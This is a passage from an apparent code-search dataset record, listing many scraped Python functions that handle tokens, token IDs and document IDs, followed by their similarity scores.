KeyError:\n id = self.oov_id\n\n ids.append(id)\n\n return ids", "def get_document_tags(self, docid):\n return [(key, json.loads(value))\n for key, value\n in self.sql_session.query(Feature)\n .filter(Feature.document == docid)\n .values(Feature.key, Feature.value)]", "def get_token_list():\n token_list = []\n tokens_dir_path = os.path.join(BASE_DIR, TOKENS_DIR)\n for dir, dirs, files in os.walk(tokens_dir_path):\n for file_name in files:\n file = open(os.path.join(tokens_dir_path, file_name), 'r')\n token_list.append(file.read().strip())\n file.close()\n return token_list", "def convert_ids_to_tokens(self, ids):\n tokens = []\n for i in ids:\n tokens.append(self.ids_to_tokens[i])\n return tokens", "def _get_doc_ids(dir_id, docname):\n cur = conn.cursor(cursor_factory=pgx.RealDictCursor)\n querystring = ('select id, source_docid, target_docid from {} where dir_id = %s and docname = %s;'\n result = execute_query(querystring.format(TABLES[3])), (dir_id, docname))\n if result:\n return result['id'], result['source_docid'], result['target_docid']\n return None, None, None", "def get_extent_token_ids(self, 
**kwargs):\n token_span = self.get_extent_tokens(**kwargs)\n return [t.index for t in token_span]", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def get_doc_id_titles(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id, title FROM documents\")\n results = [(r[0], r[1]) for r in cursor.fetchall()]\n cursor.close()\n return results", "def tokenize(doc):\n\n # Calls NLTK function to tokenize the document. Broken into individual words, cleans out punctuation\n tokens = nltk.word_tokenize(doc)\n\n return tokens", "def get_ids(self, sentence):\n return [self.get_id(word) for word in sentence.strip().split(' ')]", "def get_ids(corpus):\n corpusids = []\n for chunk in corpus:\n for _id in chunk.keys():\n corpusids.append(_id)\n return corpusids", "def tokens():\n return ['access token', 'refresh token']", "def getTokens(self):\n list = []\n for i in range(self.startIdx, self.endIdx + 1):\n token = self.sentence[i]\n list.append(token)\n return list", "def get_tokens(self):\r\n return self.token_set", "def fetch_doc_tokens(self, document_level, find_query_mixin={}):\n if document_level != 'postwise':\n raise NotImplementedError('document_level:%s' % document_level)\n\n query = {'subreddit':self.subreddit, document_level:{'$exists':True}}\n query.update(find_query_mixin)\n\n for doc in self.posts_read.find(query):\n try:\n yield doc[document_level]['tokens']\n except KeyError:\n # XXX: this shouldn't happen...\n print 'woop, doc missing %s.tokens' % document_level", "def get_all_group_ids(token) -> list:\n ids=list()\n _dict = perform_request(app_config.ENDPOINT, token)\n while True:\n for obj in _dict[\"value\"]:\n ids.append(obj[\"id\"])\n if \"@odata.nextLink\" not in _dict:\n return ids\n _dict = perform_request(_dict[\"@odata.nextLink\"], token)", "def get_positions(token, docs):\n\n all_matches = [token]\n for doc in docs:\n matches = []\n if token in doc:\n indexes = [i for i, x in enumerate(doc) if x == token]\n matches += [docs.index(doc), len(indexes), indexes]\n if matches:\n all_matches.append(matches)\n return all_matches", "def docs(self, searcher, exclude_docs=None):\r\n\r\n try:\r\n return self.matcher(searcher, exclude_docs=exclude_docs).all_ids()\r\n except TermNotFound:\r\n return []", "def get_token_list(text):\n return text.split()", "def _token_to_id(self, sequence_tokens, token_map, char_map, ngram=0,\n token_ngram_map=None, max_char_sequence_length=-1,\n max_char_length_per_token=-1):\n token_id_list = []\n char_id_list = []\n char_in_token_id_list = []\n ngram_id_list = []\n for token in sequence_tokens:\n char_id = [char_map.get(x, self.VOCAB_UNKNOWN) for x in token]\n char_id_list.extend(char_id[0:max_char_sequence_length])\n char_in_token = [char_map.get(x, self.VOCAB_UNKNOWN)\n for x in token[0:max_char_length_per_token]]\n char_in_token_id_list.append(char_in_token)\n\n token_id_list.append(\n token_map.get(token, token_map[self.VOCAB_UNKNOWN]))\n if ngram > 1:\n for j in range(2, ngram + 1):\n ngram_id_list.extend(\n token_ngram_map[x] for x in\n [\"\".join(sequence_tokens[k:k + j]) for k in\n range(len(sequence_tokens) - j + 1)] if x in\n token_ngram_map)\n if not sequence_tokens:\n token_id_list.append(self.VOCAB_PADDING)\n char_id_list.append(self.VOCAB_PADDING)\n char_in_token_id_list.append([self.VOCAB_PADDING])\n if not ngram_id_list:\n ngram_id_list.append(token_ngram_map[self.VOCAB_PADDING])\n return token_id_list, char_id_list, char_in_token_id_list, ngram_id_list", "def queryByDocId(self, 
docId):\n\n table = self.__getTable()\n return (row['entity'] for row in table.query_2(\n docId__eq = docId,\n index = 'docIdIndex'))", "def print_doc_tokens(doc):\n tokens = []\n for token in doc:\n tokens.append([token.text, token.pos_, token.dep_, token.tag_])\n\n df = pd.DataFrame(tokens, columns=[\"text\", \"part-of-speech\", \"syntactic_dependency_relation\", \"tag\"])\n return df", "def get_token(self, bot_id):\n res = self.execute(TABELLE['bot']['select']['by_id'], (bot_id,))\n # print(res)\n return res", "def tokens(self):\n # type: () -> List[Token]\n return self._tokens", "def _list_tokens(self, user_id, tenant_id=None, trust_id=None,\n consumer_id=None):\n raise exception.NotImplemented() # pragma: no cover", "def map_tokens_to_ids(self, tokens: List[str], max_length: int = None):\n # truncate extra tokens and pad to `max_length`\n if max_length:\n tokens = tokens[:max_length]\n tokens = tokens + [self._pad_token]*(max_length-len(tokens))\n return [self.map_token_to_id(token) for token in tokens]", "def iter_docids(self):\n return iter(self.client.smembers(self.dbprefix + 'docs'))", "def _get_token_ids(self, tokens):\n token_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n pad_amount = self.max_seq_length - len(tokens)\n input_ids = token_ids + [0] * pad_amount\n return np.array(input_ids)", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def get_ids_logs(doc):\n\n doc['ids'] = []\n\n with open('/var/log/suricata/eve.json', 'r') as f:\n for line in f:\n #lets go ahead and deserialize the log and pull out sig field\n sig = json.loads(line)['alert']['signature']\n #blergh, too lazy to comment out of suricata, or change UA\n if sig != \"ET POLICY Python-urllib/ Suspicious User Agent\":\n doc['ids'].append(sig)\n\n #add a check for empty ids file and lets just remove the field\n if len(doc['ids']) == 0:\n doc.pop('ids')\n return doc\n\n return doc", "def ids(self):\n return (x[\"_id\"] for x in self.document._meta.collection.find(self.spec, fields = (\"_id\",)))", "def tokens(self):\n\t\tlabels_and_synonyms = list(itertools.chain.from_iterable(list(self.term_to_tokens.values())))\n\t\ttokens = set(list(itertools.chain.from_iterable([word_tokenize(x) for x in labels_and_synonyms])))\n\t\treturn(list(tokens))", "def _tokens_to_terms(self, tokens: Sequence[str]) -> List[int]:\n ret = []\n for t in tokens:\n term = self.stemmer(t)\n if term in self.term2id_dict:\n ret.append(self.term2id_dict[term])\n else:\n self.term2id_dict[term] = self.g_term_max_id\n self.id2term_dict[self.g_term_max_id] = term\n ret.append(self.g_term_max_id)\n self.g_term_max_id += 1\n return ret", "def tokens(self) -> list:\n if self._tokens is None:\n tokens_ = sorted(list(self.elements()))\n self._tokens = tokens_\n return self._tokens", "def get_gensim_dictionary(gensim_dictionary_model):\n return list(gensim_dictionary_model.token2id.keys())", "def map_ids_to_tokens(self, ids: List[int], filter_padding=True):\n tokens = [self.map_id_to_token(id) for id in ids]\n if filter_padding:\n tokens = [t for t in tokens if t != self._pad_token]\n return tokens", "def getTokens(self):\n # NOTE: seems to be used by the evitaNominalTrainer only\n tokenList = []\n for chunkOrToken in self.dtrs:\n if chunkOrToken.isToken():\n tokenList += [chunkOrToken]\n elif chunkOrToken.isChunk():\n tokenList += chunkOrToken.dtrs\n else:\n logger.warn(\"Sentence element that is not a chunk or token\")\n return tokenList", "def getIDs():", 
"def getTokens(self):\n return self.__token", "def convert_tokens_to_ids(self, tokens, max_len=None):\n if max_len is not None:\n token_length = len(tokens)\n if max_len < token_length:\n tokens = tokens[:max_len]\n else:\n for _ in range(max_len - token_length):\n tokens.append(self.pad_token())\n return [self.stoi(tok) for tok in tokens]", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def get_tokens(self):\r\n return TokenGroup.get_tokens(self._tu, self.extent)", "def find_auth_token(document_html):\n search_result = re.search(AUTH_TOKEN_REGEX, document_html)\n if search_result:\n return search_result.group('auth_token')", "def _get_docs_in_dir(dir_id):\n querystring = 'select docname from {} where dir_id = %s;'.format(TABLES[3])\n result = execute_query(querystring, (dir_id,))\n if result:\n return [x[0] for x in result]\n return []", "def sentence_tokenize(tokenizer, sent):\n tokens = tokenizer.EncodeAsIds(sent).tokenization\n return tokens", "def tokenLookup(instrument_df,symbol_list):\r\n token_list = []\r\n for symbol in symbol_list:\r\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\r\n return token_list", "def tokenLookup(instrument_df,symbol_list):\r\n token_list = []\r\n for symbol in symbol_list:\r\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\r\n return token_list", "def get_ids(cls, text):\n tokens = TokenizerContainer.TOKENIZER.tokenize(text)\n token_ids = TokenizerContainer.TOKENIZER.convert_tokens_to_ids(tokens)\n input_ids = token_ids + [0] * (cls.MAX_LEN-len(token_ids))\n return tokens, input_ids", "def get_token_names(self) -> List[str]:\n return list(self._tokens.keys())", "def sentence_to_token_ids(sentence, vocabulary):\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]", "def doc2idx(self, document, unknown_word_index=-1):\n if isinstance(document, string_types):\n raise TypeError(\"doc2idx expects an array of unicode tokens on input, not a single string\")\n\n document = [word if isinstance(word, unicode) else unicode(word, 'utf-8') for word in document]\n return [self.token2id.get(word, unknown_word_index) for word in document]", "def tokenize_text(document, nlp):\n\n return [token.text for token in nlp(document)]", "def tokens(self):\n return self.__tokens", "def __get_lucene_contents(self, doc_id, en_list):\n contents = [{'field_name': Lucene.FIELDNAME_ID, 'field_value': doc_id, 'field_type': Lucene.FIELDTYPE_ID}]\n for en_id in en_list:\n contents.append({'field_name': \"content\", 'field_value': en_id, 'field_type': Lucene.FIELDTYPE_ID_TV})\n return contents", "def list_revoked_tokens(self):\n raise exception.NotImplemented() # pragma: no cover", "def getidlist(data: str = None) -> List[IDProfiler]:\n boxids: str = getinput(directory=DIR) if data is None else data\n idlist: List[IDProfiler] = list(map(IDProfiler, boxids.split(\"\\n\")))\n return idlist", "def tokenLookup(instrument_df,symbol_list):\n token_list = []\n for symbol in symbol_list:\n token_list.append(int(instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]))\n return token_list", "def vectorize(tokens, vocab):\n ids = []\n for token in tokens:\n if token in vocab.tok2id:\n ids.append(vocab.tok2id[token])\n else:\n ids.append(vocab.tok2id[vocab.UNK])\n return ids", "def getTokens(self):\n self.__require_privilaged_access()\n with DBSession(self.__config_db) as 
session:\n user = self.getLoggedInUser()\n sessionTokens = session.query(Session) \\\n .filter(Session.user_name == user) \\\n .filter(Session.can_expire.is_(False)) \\\n .all()\n\n result = []\n for t in sessionTokens:\n result.append(SessionTokenData(\n t.token,\n t.description,\n str(t.last_access)))\n\n return result", "def get_annotation_list(\n self,\n project_id: int,\n doc_id: int\n ) -> requests.models.Response:\n return self.get(\n 'v1/projects/{project_id}/docs/{doc_id}/annotations'.format(\n project_id=project_id,\n doc_id=doc_id\n )\n )", "def idsFromDocumentation(filename):\n\tidsInOrder = []\n\tsegment = \"\"\n\twith open(filename) as f:\n\t\tfor l in f:\n\t\t\tif \"<h2\" in l:\n\t\t\t\tsegment = l.split(\">\")[1].split(\"<\")[0]\n\t\t\tif 'id=\"SCI_' in l:\n\t\t\t\tidFeature = l.split('\"')[1]\n\t\t\t\t#~ print(idFeature)\n\t\t\t\tidsInOrder.append([segment, idFeature])\n\treturn idsInOrder", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def gettoken(tool_id, user_id):\n oauth_tokens = {\n 'access_token': '',\n 'user': {\n 'id': user_id\n }\n }\n params = {\n 'user_id': user_id\n }\n tokenq = \"\"\"select\naccess_token, refresh_token, expires_at, token_type, expires_in, user_name\nfrom tokens\nwhere user_id = :user_id\norder by expires_at desc\n\"\"\"\n tconn = dbconnect(CONFIG[CONFIG['app']['dbserver']])\n tcurr = tconn.cursor()\n try:\n results = tcurr.execute(tokenq, params).fetchone()\n except cx_Oracle.DatabaseError as err:\n LOG.error(\"Database error in retrieving tokens: %s\", err)\n\n if tcurr.rowcount > 0:\n oauth_tokens = {\n 'access_token': results[0],\n 'refresh_token': results[1],\n 'expires_at': results[2],\n 'token_type': results[3],\n 'expires_in': results[4],\n 'user': {\n 'name': results[5],\n 'id': user_id\n }\n }\n else:\n LOG.error(\"no token found for \" + str(tool_id) + ', ' + user_id)\n tcurr.close()\n tconn.close()\n return oauth_tokens", "def tokenize_doc_simple(self, doc):\n\n tokens = [word.strip(string.punctuation) for word in doc.split()]\n # remove the empty string\n return [token for token in tokens if token]", "def tokenizer(self, doc, lemmatize=False):\n doc = unicode(doc, \"utf-8\")\n if lemmatize:\n return [w.lemma_ for w in self.parser(doc)]\n else:\n return [w.text for w in self.parser(doc)]", "def sequence_to_list_ids(sequence, vocab):\n pass", "def getTokens(username):\n tokens = users.find({\"Username\": username})[0][\"Tokens\"]\n return tokens", "def tokens(self):\r\n return self.iter_tokens(self._blob)", "def get_translated_ids(id):", "def get_read_tokens(mastertoken, config):\n mt_path = mastertoken['paths']['self']\n url = \"{}{}/read_tokens.json\".\\\n format(config['domain_base'], mt_path)\n\n try:\n resp = (api_call(url, 'get', config['debug']))\n tokens = resp.json()\n except ValueError as ex:\n abort(\"Unexpected response from packagecloud API: \"\n \"{}\".format(ex.message))\n\n return tokens['read_tokens']", "def documents(pmid_23982599, civic_aid6_document):\n return [pmid_23982599, civic_aid6_document]", "def sentence_to_token_ids(self,sentence, vocabulary,\n tokenizer=None, normalize_digits=True):\n if tokenizer:\n words = tokenizer(sentence)\n else:\n words = self.basic_tokenizer(sentence)\n\n if not normalize_digits:\n return [vocabulary.get(w, self.UNK_ID) for w in words]\n # Normalize digits by 0 before looking words up in the vocabulary.\n return [vocabulary.get(re.sub(PTBReader._DIGIT_RE, \" \", w), self.UNK_ID) for w in words]", "def docs_to_list(documents):\n \n texts = [] \n for 
doc in documents:\n texts.append(doc.split())\n print ((\"The collection of documents contains {} documents\").format(len(texts)))\n return texts", "def get_selected_elements(doc):\n try:\n # Revit 2016\n return [doc.GetElement(id)\n for id in __revit__.ActiveUIDocument.Selection.GetElementIds()]\n except:\n # old method\n return list(__revit__.ActiveUIDocument.Selection.Elements)" ]
[ "0.71084183", "0.6638949", "0.64065033", "0.6308615", "0.6308615", "0.6248695", "0.6248695", "0.616698", "0.61223453", "0.60448986", "0.6016193", "0.6015829", "0.6009144", "0.59384847", "0.5869318", "0.5861415", "0.5859866", "0.5852833", "0.58410364", "0.5834465", "0.5816366", "0.58008885", "0.58006424", "0.5793585", "0.5777246", "0.5777149", "0.5776924", "0.57598704", "0.5750446", "0.5728729", "0.57229066", "0.5673558", "0.5648633", "0.5647172", "0.5640797", "0.5634816", "0.5618087", "0.56151867", "0.5613221", "0.55854183", "0.5532098", "0.55294013", "0.5519083", "0.55122906", "0.5475321", "0.5472813", "0.54664356", "0.54651076", "0.5437001", "0.5432145", "0.54201746", "0.54098976", "0.5395683", "0.5386548", "0.5382212", "0.5367989", "0.5361271", "0.5351235", "0.53112555", "0.53073", "0.53048784", "0.53008157", "0.52842635", "0.52715623", "0.5267278", "0.5267278", "0.5267278", "0.5266966", "0.52251", "0.5224945", "0.52134204", "0.5205132", "0.5205132", "0.5191797", "0.51915705", "0.5190645", "0.51888317", "0.51795524", "0.5169762", "0.51609653", "0.51598483", "0.5158202", "0.51499367", "0.51421475", "0.5136696", "0.513505", "0.5134813", "0.5134546", "0.5126149", "0.5124109", "0.5122007", "0.5116739", "0.5111097", "0.5110712", "0.51106024", "0.510913", "0.51055485", "0.5094392", "0.5073104", "0.5069208" ]
0.6642477
1
Get the token list.
def id2doc(self, ids):
    return [self.id_to_token(idx) for idx in ids]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_tokens(self) -> List[str]:\n return self.tokens", "def tokens(self):\n # type: () -> List[Token]\n return self._tokens", "def tokens(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenList)['tokens']", "def get_tokens(self):\r\n return self.token_set", "def get_token_list():\n token_list = []\n tokens_dir_path = os.path.join(BASE_DIR, TOKENS_DIR)\n for dir, dirs, files in os.walk(tokens_dir_path):\n for file_name in files:\n file = open(os.path.join(tokens_dir_path, file_name), 'r')\n token_list.append(file.read().strip())\n file.close()\n return token_list", "def getTokens(self):\n return self.__token", "def tokens(self):\n return self.__tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self):\n return self._tokens", "def tokens(self) -> list:\n if self._tokens is None:\n tokens_ = sorted(list(self.elements()))\n self._tokens = tokens_\n return self._tokens", "def getTokens(self):\n list = []\n for i in range(self.startIdx, self.endIdx + 1):\n token = self.sentence[i]\n list.append(token)\n return list", "def get_token_names(self) -> List[str]:\n return list(self._tokens.keys())", "def get_tokens(self):\r\n return TokenGroup.get_tokens(self._tu, self.extent)", "def get_Tokens(self):\n return self._output.get('Tokens', None)", "def get_token_list(text):\n return text.split()", "def tokens():\n return ['access token', 'refresh token']", "def all_tokens(self) -> List[Hashable]:\n return self._all_tokens", "def list(uid: int):\n\n return Token.list(uid)", "def list_tokens(self) -> str:\n\n return self._format_symbol_table_content(\"Tokens\", self._symbols.keys())", "def get_tokens(self):\n def _traverse_preorder(cursor, token_list): # There is a method called \"walk_preorder\" in Cursor class. 
Here we need to ignore some subtrees so we implement on our own.\n if cursor.location.file and cursor.location.file.name != self.filepath: # exclude \"#include <...>\"\n return\n if (cursor.kind, cursor.spelling) in exclude_types: # exclude node in 'exclude_types'\n return\n \n token_list.append(cursor)\n for child in cursor.get_children():\n _traverse_preorder(child, token_list)\n\n tokens = []\n _traverse_preorder(self.cursor, tokens)\n return tokens", "def getTokens(self):\n self.__require_privilaged_access()\n with DBSession(self.__config_db) as session:\n user = self.getLoggedInUser()\n sessionTokens = session.query(Session) \\\n .filter(Session.user_name == user) \\\n .filter(Session.can_expire.is_(False)) \\\n .all()\n\n result = []\n for t in sessionTokens:\n result.append(SessionTokenData(\n t.token,\n t.description,\n str(t.last_access)))\n\n return result", "def token_values(self):\n return self._token_values", "def getTokens(self):\n # NOTE: seems to be used by the evitaNominalTrainer only\n tokenList = []\n for chunkOrToken in self.dtrs:\n if chunkOrToken.isToken():\n tokenList += [chunkOrToken]\n elif chunkOrToken.isChunk():\n tokenList += chunkOrToken.dtrs\n else:\n logger.warn(\"Sentence element that is not a chunk or token\")\n return tokenList", "def tokens(self):\n tokens = []\n for index in range(len(self.sentrep)):\n tokens.append(self.sentrep.getWord(index).lexeme())\n return tokens", "def tokens(self):\r\n return self.iter_tokens(self._blob)", "def get_tokens(self, document):\n raise NotImplementedError()", "def get_tokens(self):\n\t\treturn self.get_starttokens() + self.get_endtokens()", "def tokens(self):\r\n return Tokens(self)", "def __repr__(self) -> str:\n return \"<Twilio.Oauth.V1.TokenList>\"", "def tokens(self):\n return self._sentrep.tokens()", "def get_tokens(self, *args, **kwargs) -> List[Token]:\n for text in args:\n for char in text:\n self.set_tokens(char)\n self.flush_temp()\n\n return self.tokens", "def tokens(self):\n\t\tlabels_and_synonyms = list(itertools.chain.from_iterable(list(self.term_to_tokens.values())))\n\t\ttokens = set(list(itertools.chain.from_iterable([word_tokenize(x) for x in labels_and_synonyms])))\n\t\treturn(list(tokens))", "def get_tokens():\n return (HDFS_SITE_KEY, NAMESERVICE_KEY, NN_HTTP_ADDRESS_KEY, DFS_POLICY_KEY,\n EXECUTABLE_SEARCH_PATHS, NN_HTTPS_ADDRESS_KEY, SMOKEUSER_KEY,\n KERBEROS_KEYTAB, KERBEROS_PRINCIPAL, SECURITY_ENABLED_KEY,\n METRICS_COLLECTOR_VIP_HOST_KEY, METRICS_COLLECTOR_VIP_PORT_KEY,\n METRICS_COLLECTOR_WEBAPP_ADDRESS_KEY, AMS_HTTP_POLICY)", "def bearer_tokens(self):\n return self._bearer_tokens", "def list_revoked_tokens(self):\n raise exception.NotImplemented() # pragma: no cover", "def special_tokens(self) -> List[Hashable]:\n return list(self._special_token_kv.values())", "def synth_tokens(self):\n if self.lliagraph:\n return self.lliagraph.synth_tokens.items()\n else:\n return []", "def getList(self):\n pass", "def get_token_types() -> List[type]:\n return ExtensionTokenTypes.__TOKEN_TYPES", "def getList(self):\n\treturn self.list", "def list_tokens(user):\n return AppSpecificAuthToken.select().where(AppSpecificAuthToken.user == user)", "def getToken(self):\n \n raise NotImplementedError", "def getList(self):", "def getList(self):", "def get_read_tokens(mastertoken, config):\n mt_path = mastertoken['paths']['self']\n url = \"{}{}/read_tokens.json\".\\\n format(config['domain_base'], mt_path)\n\n try:\n resp = (api_call(url, 'get', config['debug']))\n tokens = resp.json()\n except ValueError as ex:\n 
abort(\"Unexpected response from packagecloud API: \"\n \"{}\".format(ex.message))\n\n return tokens['read_tokens']", "def tokens():\n pass", "def get_list_of_tokens(self, to_lower=True, remove_newlines=True):\n if not self.tokens:\n assert self.url, \"Wrong url provided!\"\n self.text = self._get_text(remove_newlines=remove_newlines)\n self.log.debug(u\"First 100 characters of text from {url}: {text}\"\n \"\".format(url=self.url,\n text=self.text[:100]))\n self.tokens = self._get_tokens()\n self.log.debug(u\"First 100 tokens of text from {url}: {tokens}\"\n \"\".format(url=self.url,\n tokens=self.tokens))\n if to_lower:\n # all words to lowercase\n self.tokens = list(map(lambda s: s.lower(), self.tokens))\n return self.tokens", "def getList(self):\n return self.list", "def tokens(self):\n return tuple(self._tree.getWords())", "def tokenize(self):\n tknzr = TweetTokenizer()\n tkn = []\n for tweet in self.tweets:\n for word in tknzr.tokenize(tweet):\n tkn.append(word)\n return tkn", "def getList(self):\n return self.list_", "def get_tokens(self, text):\n if text is not None:\n text = text.strip()\n words = self.safe_split(text)\n return words\n return []", "def get(self, filters=None, pagination=None, sort=None):\n filters = filters or {}\n if not is_user_action_allowed('manage_others_tokens'):\n filters['_user_fk'] = current_user.id\n\n sm = get_storage_manager()\n\n result = sm.list(models.Token, filters=filters,\n pagination=pagination, sort=sort)\n\n return result", "def keys(self):\n return list(self.token2id.values())", "def list(self):\n return self._get_list()", "def parse(self) -> List[List[Union[str,int]]]:\n return self.__create_list(cp(self.tokens))", "def get_tokens():\n return (ZEPPELIN_USER_KEY, UI_SSL_ENABLED, SECURITY_ENABLED_KEY, ZEPPELIN_KEYTAB_KEY, ZEPPELIN_PRINCIPAL_KEY,\n KERBEROS_EXECUTABLE_SEARCH_PATHS_KEY, ZEPPELIN_PORT_KEY, ZEPPELIN_PORT_SSL_KEY)", "def tokens(self):\n tokens = [k for k in self.tok2ind.keys()\n if k not in {'<NULL>', '<UNK>'}]\n return tokens", "def word_list(self) -> List[str]:\n return self._word_list", "def tokens_and_tags(self):\n return list(zip(self.tokens(), self.tags()))", "def token_lookup():\n token_list = {\".\": \"||Period||\",\n \",\": \"||Comma||\",\n '\"': \"|Quotation_Mark||\",\n \";\": \"||Semicolon||\",\n \"!\": \"||Exclamation_Mark||\",\n \"?\": \"||Question_Mark||\",\n \"(\": \"||Left_Parentheses||\",\n \")\": \"||Right_Parentheses||\",\n \"--\": \"||Dash||\",\n \"\\n\": \"||Return||\"\n }\n\n return token_list", "def get_read_tokens_dict(mastertoken, config):\n token_list = {}\n tokens = get_read_tokens(mastertoken, config)\n\n for token in tokens:\n if token['name']:\n token_list[token['name']] = token['value']\n if config['debug']:\n print(\"DEBUG: Found token {} with value {}\".\n format(token['name'], token['value']))\n\n return token_list", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def get_components(self):\r\n return [Token.from_multiword(word, index, self) for index, word in enumerate(self.wordform.split('_'))]", "def getTokens(username):\n tokens = users.find({\"Username\": username})[0][\"Tokens\"]\n return tokens", "def get_list(key):\n ret = hookenv.action_get(key)\n return ret.split() if ret else []", "def get_tokens(self, node, include_extra=False):\n # type: (AstNode, bool) -> Iterator[Token]\n return self.token_range(node.first_token, node.last_token, include_extra=include_extra)", "def importantTokenList(self, ignoreSemanticTagList=[]):\n 
list = tokenlist.TokenList()\n for token in self.tokens:\n if token.isAcronym():\n expansion = token.getAcronymExpansion()\n \n# print token.text, '=', \n# for t in expansion:\n# print t.text,\n# print\n\n# list.append(token)\n# for t in token.getAcronymExpansion():\n# if self.isImportantToken(t):\n# list.append(t)\n\n if expansion == None or len(expansion) == 0:\n list.append(token)\n else:\n for t in token.getAcronymExpansion():\n if self.isImportantToken(t, ignoreSemanticTagList=ignoreSemanticTagList):\n list.append(t)\n elif self.isImportantToken(token, ignoreSemanticTagList=ignoreSemanticTagList):\n list.append(token)\n \n return list", "def __create_list(self, tokens : List[Union[str,int]]) -> List[List[Union[str,int]]]:\n if tokens:\n return [self.__add_instruction(cp(tokens[:1+syntaxParametersDict.get(tokens[0])]))] + self.__create_list(cp(tokens[1+syntaxParametersDict.get(tokens[0]):]))\n return []", "def get_symbols_list(self):\n return self.symbols_list", "def tokenize(cls, selector):\n\n cls.lexer.input(selector)\n token_list = []\n while True:\n token = cls.lexer.token()\n if not token: break\n token_list.append(token)\n return token_list", "def _list_tokens(self, user_id, tenant_id=None, trust_id=None,\n consumer_id=None):\n raise exception.NotImplemented() # pragma: no cover", "def listTags(self, authenticationToken):\r\n pass", "def tokens(self):\n data, end = \\\n self.pat.traverse(lambda obj, *args: obj.tokens(*args),\n self.begin, self.data)\n return data", "def get_nft_list(self):\n tokens = self.api.find_all(\"nft\", \"nfts\", query={})\n return tokens", "def parse_token_list(data):\n\n state = http_header_util.ParsingState(data)\n\n token_list = []\n\n while True:\n token = http_header_util.consume_token(state)\n if token is not None:\n token_list.append(token)\n\n http_header_util.consume_lwses(state)\n\n if http_header_util.peek(state) is None:\n break\n\n if not http_header_util.consume_string(state, ','):\n raise HandshakeException(\n 'Expected a comma but found %r' % http_header_util.peek(state))\n\n http_header_util.consume_lwses(state)\n\n if len(token_list) == 0:\n raise HandshakeException('No valid token found')\n\n return token_list", "def _next_tokens(self, head):\n state = head.state\n input_str = self.input_str\n position = head.position\n actions = state.actions\n in_len = len(input_str)\n tokens = []\n\n # add special STOP token if they are applicable\n if STOP in actions:\n if not self.consume_input \\\n or (self.consume_input and position == in_len):\n tokens.append(STOP_token)\n\n if position < in_len:\n # Get tokens by trying recognizers - but only if we are not at\n # the end, because token cannot be empty\n if self.custom_token_recognition:\n def get_tokens():\n return self._token_recognition(head)\n\n custom_tokens = self.custom_token_recognition(\n head, get_tokens,\n )\n if custom_tokens is not None:\n tokens.extend(custom_tokens)\n else:\n tokens.extend(self._token_recognition(head))\n\n # do lexical disambiguation if it is enabled\n if self.lexical_disambiguation:\n tokens = self._lexical_disambiguation(tokens)\n\n return tokens", "def getList(self):\n\treturn self.sorted_list.getList()", "def _next_tokens(self, context):\n state = context.state\n input_str = context.input_str\n position = context.position\n actions = state.actions\n in_len = len(input_str)\n tokens = []\n\n # add special tokens (EMPTY and STOP) if they are applicable\n if EMPTY in actions:\n tokens.append(EMPTY_token)\n if STOP in actions:\n if not self.consume_input \\\n or 
(self.consume_input and position == in_len):\n tokens.append(STOP_token)\n\n if position < in_len:\n # Get tokens by trying recognizers - but only if we are not at\n # the end, because token cannot be empty\n if self.custom_token_recognition:\n def get_tokens():\n return self._token_recognition(context)\n\n custom_tokens = self.custom_token_recognition(\n context, get_tokens,\n )\n if custom_tokens is not None:\n tokens.extend(custom_tokens)\n else:\n tokens.extend(self._token_recognition(context))\n\n # do lexical disambiguation if it is enabled\n if self.lexical_disambiguation:\n tokens = self._lexical_disambiguation(context, tokens)\n\n return tokens", "def tokenize(self, texts: List[str]) -> List[Token]:\n raise NotImplementedError", "def get_gene_tokens(self, classification: Classification) -> List[GeneToken]:\n return self.get_protein_gene_symbol_tokens(classification)", "def _list_known_secret_tokens():\n global _secret_token_map\n\n keys = list(_secret_token_map.keys())\n keys.sort()\n\n ret = ''\n for key in keys:\n if ret != '':\n ret += ', '\n ret += \"'\" + key + \"'\"\n return ret", "def tokenize(self):\n tokens = []\n while not self.eos():\n\n # Try to match a new token\n token = None\n candidates = [self.number, self.character_constant, self.string_constant,\n self.identifier, self.operator, self.punctuator]\n for f in candidates:\n col = self.pos\n try:\n self.whitespace()\n token = f()\n self.prev_white = False\n tokens.append(token)\n break\n except TokenError:\n self.pos = col\n\n # Only continue matching if a token was found\n if token is None:\n break\n\n self.whitespace()\n if not self.eos():\n raise TokenError(\"Encountered invalid token.\")\n\n return tokens", "def _get_tokens(s: str) ->List[str]:\n return [] if not s else _normalize_text(s).split()", "def list():", "def list():", "def getWordsList(self):\n return self.words", "def list(self):\n return self.request(\"GET\")", "def list(self) -> typing.List[str]:\n pass", "def access_token(self):\n social_auth = self.social_auth.get()\n return social_auth.tokens", "def token(self):\n print(\"getter of token called\")\n return self._token", "def _get_all_possible_tokens_ahead(self, context):\n tokens = []\n if context.position < len(context.input_str):\n for terminal in self.grammar.terminals.values():\n try:\n tok = terminal.recognizer(context.input_str,\n context.position)\n except TypeError:\n tok = terminal.recognizer(context, context.input_str,\n context.position)\n additional_data = ()\n if type(tok) is tuple:\n tok, *additional_data = tok\n if tok:\n tokens.append(Token(terminal, tok, context.position,\n additional_data))\n return tokens", "def _find_all_tokens(self) -> [str]:\n return re.findall(\"[a-zA-Z\\d]+\", self.soup.get_text(separator=\" \", strip=True))", "def _get_all_possible_tokens_ahead(self, context):\n tokens = []\n if context.position < len(context.input_str):\n for terminal in self.grammar.terminals.values():\n try:\n tok = terminal.recognizer(context.input_str,\n context.position)\n except TypeError:\n tok = terminal.recognizer(context, context.input_str,\n context.position)\n additional_data = ()\n if type(tok) 